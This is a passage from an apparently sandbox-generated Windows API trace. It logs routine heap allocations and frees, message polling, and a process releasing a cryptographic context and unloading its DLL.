RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0249.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0249.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0249.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0249.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0249.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51550 [0249.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0249.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e514d8 [0249.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e515b0 [0249.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51310 [0249.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0249.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0249.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51508 [0249.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51328 [0249.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e514f0 [0249.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0249.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0249.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0249.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0249.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0249.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0249.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0249.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0249.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0249.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0249.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0249.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0249.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0249.609] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0249.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0249.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0249.609] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0249.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0249.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55c70 [0249.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0249.610] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0249.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55c70 | out: hHeap=0x970000) returned 1 [0249.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0249.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51448 [0249.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0249.610] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0249.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0249.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0249.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0249.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0249.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0249.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0249.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0249.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0249.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0249.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0249.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0249.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0249.610] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0249.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0249.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0249.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0249.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0249.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0249.611] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0249.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0249.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0249.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51550 [0249.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0249.611] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0249.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0249.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0249.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0249.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0249.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0249.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0249.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0249.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0249.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0249.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0249.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0249.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0249.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0249.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0249.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0249.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0249.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0249.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0249.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0249.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0249.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0249.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0249.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0249.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0249.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0249.612] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0249.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0249.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0249.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51430 [0249.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0249.612] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0249.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0249.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0249.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0249.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0249.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0249.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0249.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0249.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0249.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0249.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0249.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0249.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0249.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0249.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0249.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0249.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0249.613] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0249.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0249.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0249.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0249.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0249.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0249.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0249.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0249.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0249.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0249.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0249.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0249.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0249.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0249.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0249.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0249.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0249.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0249.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0249.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0249.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0249.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0249.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0249.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0249.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0249.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0249.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0249.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0249.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0249.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0249.615] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0249.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69be8 [0249.615] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69be8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0249.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0249.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0249.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0249.615] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0249.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0249.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0249.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0249.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0249.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0249.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0249.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0249.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0249.671] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0249.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0249.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51538 [0249.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0249.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0249.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0249.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0249.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0249.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0249.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0249.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0249.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0249.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0249.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0249.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0249.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0249.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0249.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0249.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0249.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0249.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0249.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0249.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0249.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0249.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0249.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0249.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0249.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0249.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0249.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0249.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0249.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0249.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0249.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0249.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0249.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0249.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0249.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0249.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0249.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0249.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0249.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0249.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0249.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0249.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0249.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0249.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0249.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0249.673] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0249.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0249.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0249.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0249.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ff0 [0249.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0249.673] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0249.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ff0 | out: hHeap=0x970000) returned 1 [0249.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0249.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51568 [0249.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0249.673] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0249.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0249.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0249.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0249.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0249.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0249.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0249.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0249.673] FreeLibrary (hLibModule=0x756e0000) returned 1 [0249.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0249.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0249.674] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0249.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0249.674] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0249.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0249.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0249.674] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0249.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0249.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0249.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0249.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0249.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0249.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0249.674] HeapFree (in: 